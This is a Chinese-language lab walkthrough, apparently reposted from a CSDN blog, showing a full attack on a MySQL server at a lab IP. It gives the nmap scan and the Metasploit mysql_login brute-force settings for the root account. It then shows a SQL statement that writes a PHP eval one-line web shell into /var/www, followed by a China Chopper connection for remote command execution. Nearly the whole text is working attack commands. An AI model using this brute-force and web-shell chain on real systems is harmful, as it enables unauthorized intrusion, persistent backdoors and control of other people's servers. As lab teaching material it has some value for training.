一、信息收集
利用nmap工具扫描靶机3306端口开启情况
nmap -sV 192.168.180.133 -p 3306
发现靶机开启3306端口,MySQL数据库
二、渗透测试
打开msfconsole渗透测试平台
搜索mysql_login漏洞模块
search mysql_login
使用auxiliary/scanner/mysql/mysql_login漏洞攻击模块
use 0
查看需要配置的参数
show options
设置密码字典
set pass_file /pass.txt
设置目标IP
set rhosts 192.168.180.133
设置爆破用户名
set username root
运行
exploit
成功爆破出密码 P@sswrd
三、远程登录
使用我们爆破出的用户名密码远程登录MySQL数据库
mysql -h 192.168.180.133 -u root -p
登录成功后写入一句话木马到/var/www目录中
select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';
写入成功后使用中国菜刀连接
双击进入
连接成功,可看到系统文件及信息
右击也可以打开虚拟终端,执行命令
实验结束
本文转载自: https://blog.csdn.net/xyc_0/article/details/129472446
版权归原作者 末班 车 所有, 如有侵权,请联系我们删除。
版权归原作者 末班 车 所有, 如有侵权,请联系我们删除。